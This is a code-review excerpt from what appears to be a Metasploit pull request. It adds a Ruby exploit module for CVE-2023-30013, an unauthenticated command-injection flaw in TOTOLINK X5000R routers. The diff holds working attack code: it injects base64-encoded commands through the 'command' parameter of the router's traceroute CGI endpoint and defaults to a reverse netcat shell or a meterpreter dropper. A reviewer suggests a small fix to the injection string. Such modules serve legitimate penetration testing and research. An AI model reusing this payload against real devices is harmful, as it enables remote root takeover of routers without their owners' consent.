modules/exploits/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013.rb

```diff
@@ -0,0 +1,129 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TOTOLINK X500R unauthenticated remote command execution vulnerability.',
+        'Description' => %q{
+          TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability
+          in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through
+          the "command" parameter.
+          After exploitation, an attacker will have full access with the same user privileges under
+          which the the webserver is running (typically as user `root`, ;-).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Kazamayc https://github.com/Kazamayc', # Discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2023-30013'],
+          ['URL', 'https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013']
+        ],
+        'DisclosureDate' => '2023-05-05',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'printf', 'echo', 'bourne'],
+              'Linemax' => 65535,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Encode payload with base64 and generate random number
+    cmd_b64 = Base64.strict_encode64(cmd)
+    cmd = "echo #{cmd_b64}|base64 -d|bash"
+    num = rand(1..500)
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'cstecgi.cgi'),
+      'data' => "{\"command\":\"127.0.0.1; #{cmd};\",\"num\":\"#{num}\",\"topicurl\":\"setTracerouteCfg\"}"
```

Comment:
```suggestion
      'data' => "{\"command\":\"127.0.0.1; #{cmd};#\",\"num\":\"#{num}\",\"topicurl\":\"setTracerouteCfg\"}"
```

No need to have trailing characters processed by bash.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18365/commits/094685fa9339859b66036be5868ae472318cf3a7.